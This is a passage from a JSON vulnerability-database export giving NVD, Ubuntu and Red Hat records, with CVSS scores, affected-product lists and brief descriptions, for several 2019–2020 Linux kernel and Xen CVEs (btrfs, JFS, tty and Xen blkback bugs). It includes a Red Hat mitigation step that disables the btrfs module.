"obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19813"], "modified": "2021-03-12T16:11:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/a:netapp:hci_management_node:-", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/a:netapp:solidfire:-", "cpe:/o:netapp:h610s_firmware:-", "cpe:/a:netapp:active_iq_unified_manager:*", "cpe:/a:netapp:steelstore_cloud_integrated_storage:-", "cpe:/o:netapp:aff_a700s_firmware:-", "cpe:/o:netapp:aff_a400_firmware:-", "cpe:/o:linux:linux_kernel:5.0.21", "cpe:/o:netapp:fas8700_firmware:-", "cpe:/o:netapp:fas8300_firmware:-", "cpe:/a:netapp:data_availability_services:-", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2019-19813", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-19813", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:solidfire:-:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*", "cpe:2.3:o:netapp:h610s_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:netapp:fas8700_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:netapp:fas8300_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:netapp:aff_a400_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:netapp:aff_a700s_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:5.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:data_availability_services:-:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:vmware_vsphere:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*", "cpe:2.3:a:netapp:hci_management_node:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-04-23T00:45:23", "description": "In the Linux kernel 5.0.21, mounting a crafted btrfs filesystem image and performing some operations can cause slab-out-of-bounds write access in __btrfs_map_block in fs/btrfs/volumes.c, because a value of 1 for the number of data stripes is mishandled.", "edition": 13, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-12-17T06:15:00", "title": "CVE-2019-19816", "type": "cve", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19816"], "modified": "2021-03-15T22:27:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/a:netapp:hci_management_node:-", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/a:netapp:solidfire:-", "cpe:/o:netapp:h610s_firmware:-", "cpe:/a:netapp:active_iq_unified_manager:*", "cpe:/a:netapp:steelstore_cloud_integrated_storage:-", "cpe:/o:netapp:aff_a700s_firmware:-", "cpe:/o:netapp:aff_a400_firmware:-", "cpe:/o:linux:linux_kernel:5.0.21", "cpe:/o:netapp:fas8700_firmware:-", "cpe:/o:netapp:fas8300_firmware:-", "cpe:/a:netapp:data_availability_services:-", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2019-19816", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-19816", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:solidfire:-:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*", "cpe:2.3:o:netapp:h610s_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:netapp:fas8700_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:netapp:fas8300_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:netapp:aff_a400_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:netapp:aff_a700s_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:5.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:data_availability_services:-:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:vmware_vsphere:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*", "cpe:2.3:a:netapp:hci_management_node:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-07-22T08:54:33", "description": "An issue was discovered in the Linux kernel through 5.10.1, as used with Xen through 4.14.x. The Linux kernel PV block backend expects the kernel thread handler to reset ring->xenblkd to NULL when stopped. However, the handler may not have time to run if the frontend quickly toggles between the states connect and disconnect. As a consequence, the block backend may re-use a pointer after it was freed. A misbehaving guest can trigger a dom0 crash by continuously connecting / disconnecting a block frontend. Privilege escalation and information leaks cannot be ruled out. This only affects systems with a Linux blkback.", "edition": 11, "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-12-15T17:15:00", "title": "CVE-2020-29569", "type": "cve", "cwe": ["CWE-252"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29569"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:linux:linux_kernel:5.10.1", "cpe:/o:debian:debian_linux:10.0", "cpe:/o:netapp:hci_compute_node_bios:-", "cpe:/a:netapp:solidfire_\\&_hci_storage_node:-", "cpe:/a:netapp:solidfire_\\&_hci_management_node:-", "cpe:/o:xen:xen:4.14.1", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2020-29569", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-29569", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.14.1:*:*:*:*:*:*:*", "cpe:2.3:o:netapp:hci_compute_node_bios:-:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:5.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:solidfire_\\&_hci_management_node:-:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:solidfire_\\&_hci_storage_node:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-07-22T08:54:33", "description": "An issue was discovered in Xen through 4.14.x. Some OSes (such as Linux, FreeBSD, and NetBSD) are processing watch events using a single thread. If the events are received faster than the thread is able to handle, they will get queued. As the queue is unbounded, a guest may be able to trigger an OOM in the backend. All systems with a FreeBSD, Linux, or NetBSD (any version) dom0 are vulnerable.", "edition": 10, "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 4.0}, "published": "2020-12-15T17:15:00", "title": "CVE-2020-29568", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29568"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:debian:debian_linux:10.0", "cpe:/o:xen:xen:4.14.1", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2020-29568", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-29568", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.14.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-07-03T09:09:24", "description": "A flaw was found in the JFS filesystem code in the Linux Kernel which allows a local attacker with the ability to set extended attributes to panic the system, causing memory corruption or escalating privileges. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.", "edition": 4, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-26T13:15:00", "title": "CVE-2020-27815", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "baseScore": 6.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 8.5, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27815"], "modified": "2021-07-02T12:15:00", "cpe": ["cpe:/o:debian:debian_linux:10.0", "cpe:/o:linux:linux_kernel:5.9.6", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2020-27815", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-27815", "cvss": {"score": 6.1, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:C"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:5.9.6:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-04-23T01:09:46", "description": "A locking inconsistency issue was discovered in the tty subsystem of the Linux kernel through 5.9.13. drivers/tty/tty_io.c and drivers/tty/tty_jobctrl.c may allow a read-after-free attack against TIOCGSID, aka CID-c8bcd9c5be24.", "edition": 10, "cvss3": {"exploitabilityScore": 0.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.4, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-12-09T17:15:00", "title": "CVE-2020-29660", "type": "cve", "cwe": ["CWE-416", "CWE-667"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29660"], "modified": "2021-03-09T21:15:00", "cpe": ["cpe:/o:linux:linux_kernel:5.9.13", "cpe:/o:fedoraproject:fedora:32", "cpe:/o:fedoraproject:fedora:33"], "id": "CVE-2020-29660", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-29660", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:5.9.13:*:*:*:*:*:*:*"]}, {"lastseen": "2021-04-23T01:09:46", "description": "A locking issue was discovered in the tty subsystem of the Linux kernel through 5.9.13. drivers/tty/tty_jobctrl.c allows a use-after-free attack against TIOCSPGRP, aka CID-54ffccbf053b.", "edition": 11, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-09T17:15:00", "title": "CVE-2020-29661", "type": "cve", "cwe": ["CWE-416", "CWE-667"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29661"], "modified": "2021-03-09T21:15:00", "cpe": ["cpe:/o:linux:linux_kernel:5.9.13", "cpe:/o:fedoraproject:fedora:32", "cpe:/o:fedoraproject:fedora:33"], "id": "CVE-2020-29661", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-29661", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:5.9.13:*:*:*:*:*:*:*"]}], "ubuntucve": [{"lastseen": "2021-06-30T21:45:59", "bulletinFamily": "info", "cvelist": ["CVE-2019-19813"], "description": "In the Linux kernel 5.0.21, mounting a crafted btrfs filesystem image,\nperforming some operations, and then making a syncfs system call can lead\nto a use-after-free in __mutex_lock in kernel/locking/mutex.c. This is\nrelated to mutex_can_spin_on_owner in kernel/locking/mutex.c,\n__btrfs_qgroup_free_meta in fs/btrfs/qgroup.c, and\nbtrfs_insert_delayed_items in fs/btrfs/delayed-inode.c.\n\n#### Bugs\n\n * <https://bugzilla.suse.com/show_bug.cgi?id=1159435>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[tyhicks](<https://launchpad.net/~tyhicks>) | As of 2020-01-09, no upstream fix is available \n[sbeattie](<https://launchpad.net/~sbeattie>) | upstream developer asserts in suse bug that the enhanced btrfs tree-checker addresses this issue, which was backported to at least the 4.4 kernel.\n", "modified": "2019-12-17T00:00:00", "published": "2019-12-17T00:00:00", "id": "UB:CVE-2019-19813", "href": "https://ubuntu.com/security/CVE-2019-19813", "type": "ubuntucve", "title": "CVE-2019-19813", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-06-30T21:45:58", "bulletinFamily": "info", "cvelist": ["CVE-2019-19816"], "description": "In the Linux kernel 5.0.21, mounting a crafted btrfs filesystem image and\nperforming some operations can cause slab-out-of-bounds write access in\n__btrfs_map_block in fs/btrfs/volumes.c, because a value of 1 for the\nnumber of data stripes is mishandled.\n\n#### Bugs\n\n * <https://bugzilla.suse.com/show_bug.cgi?id=1159439>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[tyhicks](<https://launchpad.net/~tyhicks>) | As of 2020-01-09, no upstream fix is available \n[sbeattie](<https://launchpad.net/~sbeattie>) | upstream developer asserts in suse bug that the enhanced btrfs tree-checker will address this issue, so would be fixed in 4.4.x and newer\n", "modified": "2019-12-17T00:00:00", "published": "2019-12-17T00:00:00", "id": "UB:CVE-2019-19816", "href": "https://ubuntu.com/security/CVE-2019-19816", "type": "ubuntucve", "title": "CVE-2019-19816", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-30T21:30:47", "bulletinFamily": "info", "cvelist": ["CVE-2020-29569"], "description": "An issue was discovered in the Linux kernel through 5.10.1, as used with\nXen through 4.14.x. The Linux kernel PV block backend expects the kernel\nthread handler to reset ring->xenblkd to NULL when stopped. However, the\nhandler may not have time to run if the frontend quickly toggles between\nthe states connect and disconnect. As a consequence, the block backend may\nre-use a pointer after it was freed. A misbehaving guest can trigger a dom0\ncrash by continuously connecting / disconnecting a block frontend.\nPrivilege escalation and information leaks cannot be ruled out. This only\naffects systems with a Linux blkback.", "modified": "2020-12-15T00:00:00", "published": "2020-12-15T00:00:00", "id": "UB:CVE-2020-29569", "href": "https://ubuntu.com/security/CVE-2020-29569", "type": "ubuntucve", "title": "CVE-2020-29569", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-30T21:30:49", "bulletinFamily": "info", "cvelist": ["CVE-2020-29568"], "description": "An issue was discovered in Xen through 4.14.x. Some OSes (such as Linux,\nFreeBSD, and NetBSD) are processing watch events using a single thread. If\nthe events are received faster than the thread is able to handle, they will\nget queued. As the queue is unbounded, a guest may be able to trigger an\nOOM in the backend. All systems with a FreeBSD, Linux, or NetBSD (any\nversion) dom0 are vulnerable.", "modified": "2020-12-15T00:00:00", "published": "2020-12-15T00:00:00", "id": "UB:CVE-2020-29568", "href": "https://ubuntu.com/security/CVE-2020-29568", "type": "ubuntucve", "title": "CVE-2020-29568", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-06-30T21:31:37", "bulletinFamily": "info", "cvelist": ["CVE-2020-27815"], "description": "A flaw was found in the JFS filesystem code in the Linux Kernel which\nallows a local attacker with the ability to set extended attributes to\npanic the system, causing memory corruption or escalating privileges. The\nhighest threat from this vulnerability is to confidentiality, integrity, as\nwell as system availability.", "modified": "2020-11-30T00:00:00", "published": "2020-11-30T00:00:00", "id": "UB:CVE-2020-27815", "href": "https://ubuntu.com/security/CVE-2020-27815", "type": "ubuntucve", "title": "CVE-2020-27815", "cvss": {"score": 6.1, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2021-06-30T21:31:05", "bulletinFamily": "info", "cvelist": ["CVE-2020-29660"], "description": "A locking inconsistency issue was discovered in the tty subsystem of the\nLinux kernel through 5.9.13. drivers/tty/tty_io.c and\ndrivers/tty/tty_jobctrl.c may allow a read-after-free attack against\nTIOCGSID, aka CID-c8bcd9c5be24.", "modified": "2020-12-09T00:00:00", "published": "2020-12-09T00:00:00", "id": "UB:CVE-2020-29660", "href": "https://ubuntu.com/security/CVE-2020-29660", "type": "ubuntucve", "title": "CVE-2020-29660", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-07-01T21:38:36", "bulletinFamily": "info", "cvelist": ["CVE-2020-29661"], "description": "A locking issue was discovered in the tty subsystem of the Linux kernel\nthrough 5.9.13. drivers/tty/tty_jobctrl.c allows a use-after-free attack\nagainst TIOCSPGRP, aka CID-54ffccbf053b.\n\n#### Bugs\n\n * <https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1909486>\n", "modified": "2020-12-09T00:00:00", "published": "2020-12-09T00:00:00", "id": "UB:CVE-2020-29661", "href": "https://ubuntu.com/security/CVE-2020-29661", "type": "ubuntucve", "title": "CVE-2020-29661", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhatcve": [{"lastseen": "2021-05-19T23:33:56", "bulletinFamily": "info", "cvelist": ["CVE-2019-19813"], "description": "In the Linux kernel 5.0.21, mounting a crafted btrfs filesystem image, performing some operations, and then making a syncfs system call can lead to a use-after-free in __mutex_lock in kernel/locking/mutex.c. This is related to mutex_can_spin_on_owner in kernel/locking/mutex.c, __btrfs_qgroup_free_meta in fs/btrfs/qgroup.c, and btrfs_insert_delayed_items in fs/btrfs/delayed-inode.c.\n", "modified": "2021-03-18T18:20:14", "published": "2019-12-18T17:36:30", "id": "RH:CVE-2019-19813", "href": "https://access.redhat.com/security/cve/cve-2019-19813", "type": "redhatcve", "title": "CVE-2019-19813", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-05-19T23:33:56", "bulletinFamily": "info", "cvelist": ["CVE-2019-19816"], "description": "A flaw was found in the implementation of the BTRFS file system code in the Linux kernel. An attacker, who is able to mount a crafted BTRFS filesystem and perform common filesystem operations, can possibly cause an out-of-bounds write to memory. This could lead to memory corruption or privilege escalation.\n#### Mitigation\n\nAs the BTRFS module will be auto-loaded when required, its use can be disabled by preventing the module from loading with the following instructions: \n\n\n# echo "install btrfs /bin/true" >> /etc/modprobe.d/disable-btrfs.conf \n\n\nThe system will need to be restarted if the BTRFS modules are loaded, it may be possible to unload them. In most circumstances, the BTRFS kernel modules will be unable to be unloaded while any BTRFS filesystems are mounted or in use. \n\n\nIf the system requires this module to work correctly, this mitigation may not be suitable. \n\n\nIf you need further assistance, see KCS article <https://access.redhat.com/solutions/41278> or contact Red Hat Global Support Services. \n\n", "modified": "2021-03-18T18:20:19", "published": "2019-12-18T18:06:31", "id": "RH:CVE-2019-19816", "href": "https://access.redhat.com/security/cve/cve-2019-19816", "type": "redhatcve", "title": "CVE-2019-19816", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-04T17:36:07", "bulletinFamily": "info", "cvelist": ["CVE-2020-27815"], "description": "A flaw was found in the JFS filesystem code. This flaw allows a local attacker with the ability to set extended attributes to panic the system, causing memory corruption or escalating privileges. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.\n", "modified": "2021-06-04T09:43:36", "published": "2020-11-30T19:29:12", "id": "RH:CVE-2020-27815", "href": "https://access.redhat.com/security/cve/cve-2020-27815", "type": "redhatcve", "title": "CVE-2020-27815", "cvss": {"score": 6.1, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2021-05-19T23:32:01", "bulletinFamily": "info", "cvelist": ["CVE-2020-29660"], "description": "A locking inconsistency issue was discovered in the tty subsystem of the Linux kernel. A local user could use this flaw to read numerical value from memory after free.\n#### Mitigation\n\nMitigation for this issue is either not available or the currently available options don't meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability. \n\n", "modified": "2021-03-18T18:24:51", "published": "2020-12-10T18:16:16", "id": "RH:CVE-2020-29660", "href": "https://access.redhat.com/security/cve/cve-2020-29660", "type": "redhatcve", "title": "CVE-2020-29660", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-06-16T05:39:40", "bulletinFamily": "info", "cvelist": ["CVE-2020-29661"], "description": "A locking vulnerability was found in the tty subsystem of the Linux kernel in drivers/tty/tty_jobctrl.c. This flaw allows a local attacker to possibly corrupt memory or escalate privileges. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.\n#### Mitigation\n\nRed Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update as soon as possible. \n\n", "modified": "2021-06-16T03:14:03", "published": "2020-12-10T18:11:37", "id": "RH:CVE-2020-29661", "href": "https://access.redhat.com/security/cve/cve-2020-29661", "type": "redhatcve", "title": "CVE-2020-29661", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2021-02-25T11:51:56", "bulletinFamily": "unix", "cvelist": ["CVE-2020-27815", "CVE-2020-29374", "CVE-2020-29568", "CVE-2020-29661", "CVE-2020-29660"], "description": "It was discovered that the jfs file system implementation in the Linux \nkernel contained an out-of-bounds read vulnerability. A local attacker \ncould use this to possibly cause a denial of service (system crash). \n(CVE-2020-27815)\n\nIt was discovered that the memory management subsystem in the Linux kernel \ndid not properly handle copy-on-write operations in some situations. A \nlocal attacker could possibly use this to gain unintended write access to \nread-only memory pages. (CVE-2020-29374)\n\nMichael Kurth and Pawel Wieczorkiewicz discovered that the Xen event \nprocessing backend in the Linux kernel did not properly limit the number of \nevents queued. An attacker in a guest VM could use this to cause a denial \nof service in the host OS. (CVE-2020-29568)\n\nJann Horn discovered that the tty subsystem of the Linux kernel did not use \nconsistent locking in some situations, leading to a read-after-free \nvulnerability. A local attacker could use this to cause a denial of service \n(system crash) or possibly expose sensitive information (kernel memory). \n(CVE-2020-29660)\n\nJann Horn discovered a race condition in the tty subsystem of the Linux \nkernel in the locking for the TIOCSPGRP ioctl(), leading to a use-after- \nfree vulnerability. A local attacker could use this to cause a denial of \nservice (system crash) or possibly execute arbitrary code. (CVE-2020-29661)", "edition": 1, "modified": "2021-02-25T00:00:00", "published": "2021-02-25T00:00:00", "id": "USN-4748-1", "href": "https://ubuntu.com/security/notices/USN-4748-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-05T14:48:49", "bulletinFamily": "unix", "cvelist": ["CVE-2020-27830", "CVE-2020-27815", "CVE-2020-25669", "CVE-2020-28941", "CVE-2020-29569", "CVE-2020-29374", "CVE-2020-29568", "CVE-2020-29661", "CVE-2020-29660"], "description": "Bodong Zhao discovered a use-after-free in the Sun keyboard driver \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service or possibly execute arbitrary code. \n(CVE-2020-25669)\n\nIt was discovered that the jfs file system implementation in the Linux \nkernel contained an out-of-bounds read vulnerability. A local attacker \ncould use this to possibly cause a denial of service (system crash). \n(CVE-2020-27815)\n\nShisong Qin and Bodong Zhao discovered that Speakup screen reader driver in \nthe Linux kernel did not correctly handle setting line discipline in some \nsituations. A local attacker could use this to cause a denial of service \n(system crash). (CVE-2020-27830, CVE-2020-28941)\n\nIt was discovered that the memory management subsystem in the Linux kernel \ndid not properly handle copy-on-write operations in some situations. A \nlocal attacker could possibly use this to gain unintended write access to \nread-only memory pages. (CVE-2020-29374)\n\nMichael Kurth and Pawel Wieczorkiewicz discovered that the Xen event \nprocessing backend in the Linux kernel did not properly limit the number of \nevents queued. An attacker in a guest VM could use this to cause a denial \nof service in the host OS. (CVE-2020-29568)\n\nOlivier Benjamin and Pawel Wieczorkiewicz discovered a race condition the \nXen paravirt block backend in the Linux kernel, leading to a use-after-free \nvulnerability. An attacker in a 